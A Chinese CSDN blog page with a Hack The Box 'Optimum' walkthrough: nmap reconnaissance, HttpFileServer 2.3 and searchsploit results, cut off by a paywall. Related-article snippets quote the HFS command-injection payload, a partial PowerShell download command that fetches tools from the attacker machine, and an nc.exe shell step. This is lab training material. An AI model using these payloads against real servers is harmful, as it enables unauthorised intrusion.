Hackthebox:Optimum Walkthrough(not use metasploit)

最新推荐文章于 2024-08-03 17:22:50 发布
最新推荐文章于 2024-08-03 17:22:50 发布
阅读量529 收藏
点赞数 1
分类专栏: Hackthebox 文章标签: 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alexhcf/article/details/110733957
版权
本文详细介绍了如何利用 Hackthebox 中 Optimum 的一个RCE漏洞获取shell,首先通过信息收集发现Http File Server 2.3存在漏洞,尝试不同exploit,最终成功在本地开启监听并通过Windows-Exploit-Suggester寻找提权机会,但提权过程遇到困难。
摘要由CSDN通过智能技术生成

信息收集

nmap 10.10.10.8

发现只开了一个80端口的http

浏览器打开
在这里插入图片描述

google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3

查找相关漏洞

searchsploit HFS

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                                                                                                                 | exploits/osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                                                                                                           | exploits/osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                                                                                                       | exploits/osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                                                                                                                | exploits/osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                                                                                                        | exploits/windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                                                       | exploits/linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                                                                                                            | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                                                                                                 | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                                                    | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                               | exploits/windows/remote/34668.txt
Rejetto HTTP File Server
最低0.47元/天 解锁文章
尸者狗
关注
专栏目录
HackTheBox-optimum&shocker渗透测试
weixin_43111940的博客
04-16 281
optimum 端口 sudo nmap -sC -sV -A -p 80 10.10.10.8 可以看到是fileserver和对应的版本2.3 找到对应的CVE-2014-6287 看一下这个漏洞的详细信息,就是一个类似00截断去执行命令的RCE http://localhost:80/?search=%00{.exec|cmd.} bp抓包修改参数 kali监听网卡 sudo tcpdump -i tun0 抓到了icmp包,可以命令执行 在靶机上执行powershell命令来下载攻击机上
No.52-HackTheBox-windows-Optimum-Walkthrough渗透学习
qq_34801745的博客
02-12 686
** HackTheBox-windows-Optimum-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/6 靶机难度:中等(4.7/10) 靶机发布日期:2017年10月3日 靶机描述: Optimum is a beginner-level machine which mainly focuses on ...
[tryhackme] Steel Mountain
最新发布
2301_77295404的博客
08-03 649
先用nmap扫描端口:它在8080端口运行着HttpFileServer。
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1942
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
渗透实战-HttpFileServer漏洞利用
网络安全领域优质创作者
11-05 1811
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.49-oX10.11.1.49.xml xsltproc-o10.11.1.49.html10.11.1.49.xml 9505端口运行HttpFileServer服务,搜索HFS得到39161.py修改里面的端口和放置nc.exe 得到shell $secpasswd=ConvertTo-SecureString"aliceishere" -As...
HTTPfileserver rce复现(HFS)
whojoe的博客
07-02 1947
HTTPfileserver rce复现(HFS)环境搭建漏洞复现同一网络环境内网msf小结 环境搭建 hfs在比较早的版本存在命令执行漏洞,2.3c及以前的2.3x版本 下载链接 http://d3.meisq.net:806/1206/hfshttp.zip 打开之后设置默认运行 这里 kaliip192.168.164.129 HFSip192.168.164.128 漏洞复现 同一网络环境 kali配置 msfconsole search hfs use exploit/windows/http
Hackthebox:academy Walkthrough(not use metasploit
汗的博客
12-18 618
预备知识 越权、CVE-2018-15133(APP_KEY 泄露情况下的 Laravel RCE 漏洞)、目录爆破(递归)、敏感信息泄露 linPEAS、/var/log/audit等敏感信息泄露 信息收集和获取立足点 nmap基础扫描一下 详细收集信息,先丢在旁边,下面这个proxychains必须在sudo前,含义参见Nmap Cheat Sheet proxychains sudo nmap -p 1-65535 -sV -sS -T4 10.10.10.215 nmap开了80端口,所以先在后台
Hackthebox:Granny Walkthrough(not use metasploit
汗的博客
12-06 1098
预备知识 nikto、nmap、iis6.0的webdav、davtest 信息收集a nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标机器 直接就是报错页面,迷惑,不过可知服务器是iis 扫了下目录,毫无思路,nmap扫下漏洞 nmap -script=vuln 10.10.10.15 还是没什么发现 nikto 扫一下,这次的信息就多了 nikto -h http://10.10.10.15 + Server: Microsoft-IIS/6.0 + Retrieved
HTB Optimum[Hack The Box HTB靶场]writeup系列6
重新启程
02-04 3159
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行systeminfo 执行windows-exploit-suggester.py 执行ms16-098 0x00 靶机情况 可以看到这台靶机是windows的靶机,难...
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 460
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
Http File Server V2.30 WEB服务器
05-12
Http File Server V2.30
打破冷漠僵局文章_保持冷静并打破僵局-最佳
cumi7754的博客
08-11 624
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
CVE-2014-6287漏洞利用
yeshankuangrenaaaaa的博客
07-23 1509
目录CVE-2014-6287漏洞利用漏洞描述参考链接漏洞描述漏洞威胁版本漏洞复现靶机环境准备攻击浏览器方式脚本方式kali-msf工具复现结论 CVE-2014-6287漏洞利用 漏洞描述 参考链接 CVE-2014-6287 漏洞描述 发布时间:2014-09-15漏洞平台:windows 漏洞应用:HttpFileServer_v2.3_search命令执行漏洞 HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器。Rejetto网站提供的HTTPFileServer 2.3b
Rejetto HTTP文件服务器 未授权RCE漏洞复现(CVE-2024-23692)
0xSec
06-11 2391
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
HackTheBox-Optimum
weixin_45345568的博客
10-09 385
HackTheBox-Optimum ip:10.10.10.8 0x01 信息搜集: 1.nmap扫描IP nmap -A -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 16:05 CST Nmap scan report for 10.10.10.8 Host is up (0.34s latency). Not shown: 999 filtered ports PORT STATE SERVICE VE
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6358
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5636
最近爆出了HFS(Http File Server)爆出了这个漏洞。
ModuleNotFoundError: No module named 'optimum.quanto'
07-02
"ModuleNotFoundError: No module named 'optimum.quanto'" 这是一个 Python 中常见的错误,当你尝试导入名为 'optimum.quanto' 的模块时,Python 解释器找不到这个模块。这通常意味着以下几个可能的情况: 1. **模块未安装**:你可能还没有安装 'optimum' 包,特别是 'quanto' 组件。你可以使用 `pip install optimum` 或者 `pip install optimum[quanto]`(如果 'quanto' 是可选组件)来安装。 2. **包路径问题**:模块可能不在 Python 的默认搜索路径中。检查你的项目结构,确保 'optimum' 包位于正确的文件夹,并且在你的脚本或环境中添加了正确的路径。 3. **版本兼容性**:如果你的代码引用了一个特定版本的 'optimum', 但当前安装的版本不包含 'quanto',可能会导致这个问题。确保你的 'optimum' 版本支持 'quanto'。 4. **命名冲突或拼写错误**:确保你在导入时的模块名拼写无误,有时由于类似 'quanto' 和 'quantity' 这样的相似名称可能导致混淆。 为了解决这个问题,你可以按照上述步骤排查并尝试相应的解决方法。如果你能提供更多的上下文或者详细步骤,我可以给出更具体的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值